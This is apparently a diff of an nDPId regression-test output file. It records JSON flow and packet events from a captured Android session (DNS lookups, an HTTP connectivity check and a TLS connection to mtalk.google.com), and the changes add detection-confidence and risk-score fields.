 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1490976024848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1490976024848,"pkt":"ePiC0\/vCAMDKkaPvCABFAABbz+1AAEARvaqsECoBrBAq2AA12UMAR0w654SBgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAABAAHADAABAAEAAAEYAASs2QmO"}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1490976024848,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.9.142"}}
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1490976024848,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.9.142"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024857,"flow_last_seen":1490976024857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976024857,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1490976024857,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976024857,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8rxxAAEAG\/k+sECrYrNkJjutWAFC1gOcZAAAAAKAC\/\/\/pcgAAAgQFtAQCCAoA9kgFAAAAAAEDAwg="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1490976024894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976024894,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8rv4AADQGSm6s2QmOrBAq2ABQ61bhGRrktYDnGqASpajwtAAAAgQFZAQCCApVvgGZAPZIBQEDAwc="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1490976024896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976024896,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0rx1AAEAG\/lasECrYrNkJjutWAFC1gOca4Rka5YAQAVfDfgAAAQEICgD2SAlVvgGZ"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976024857,"flow_last_seen":1490976024899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976024899,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976024857,"flow_last_seen":1490976024899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976024899,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1490976027514,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1490976027514,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WktAAEARM2qsECrYrBAqAc\/EADUAKrjvz8MBAAABAAAAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAQ=="}
-00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027522,"flow_last_seen":1490976027522,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976027522,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1490976027522,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976027522,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WkxAAEARM2usECrYrBAqAc17ADUAKKL+U00BAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027522,"flow_last_seen":1490976027522,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976027522,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027522,"flow_last_seen":1490976027522,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976027522,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1490976027523,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1490976027523,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM0NFAAEARvNWsECoBrBAq2AA1zXsAOK5EU02BgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAAEGAATYOtrE"}
-00755{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976027523,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}}
+00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976027523,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}}
 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1490976027560,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"ts_msec":1490976027560,"pkt":"ePiC0\/vCAMDKkaPvCABFAABr0NVAAEARvLKsECoBrBAq2AA1z8QAV0oUz8OBgAABAAIAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAcAMAAUAAQABUX8AEQxtb2JpbGUtZ3RhbGsBbMASwC4AAQABAAABKwAErcLfvA=="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976027560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.223.188"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976027560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.223.188"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027567,"flow_last_seen":1490976027567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976027567,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1490976027567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976027567,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81nRAAEAG\/9+sECrYrcLfvKd+FGxeQZ9gAAAAAKAC\/\/\/gAAAAAgQFtAQCCAoA9kkUAAAAAAEDAwg="}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1490976027617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976027617,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA86FEAACsGQwOtwt+8rBAq2BRsp36O4XTVXkGfYaASpajFDgAAAgQFZAQCCAor\/EXWAPZJFAEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1490976027621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976027621,"pkt":"AMDKkaPvePiC0\/vCCABFAAA01nVAAEAG\/+asECrYrcLfvKd+FGxeQZ9hjuF01oAQAVeX1wAAAQEICgD2SRkr\/EXW"}
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027567,"flow_last_seen":1490976027625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1490976027625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976027567,"flow_last_seen":1490976027674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1490976027674,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}}
+01097{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027567,"flow_last_seen":1490976027625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1490976027625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01159{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976027567,"flow_last_seen":1490976027674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1490976027674,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1490976027724,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976027724,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Wk1AAEARM2qsECrYrBAqASjeADUAKB2sfT0BAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1490976027725,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1490976027725,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM0NhAAEARvM6sECoBrBAq2AA1KN4AOCjyfT2BgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAAEGAATYOtrE"}
-00755{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976027725,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}}
+00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976027725,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027733,"flow_last_seen":1490976027733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976027733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
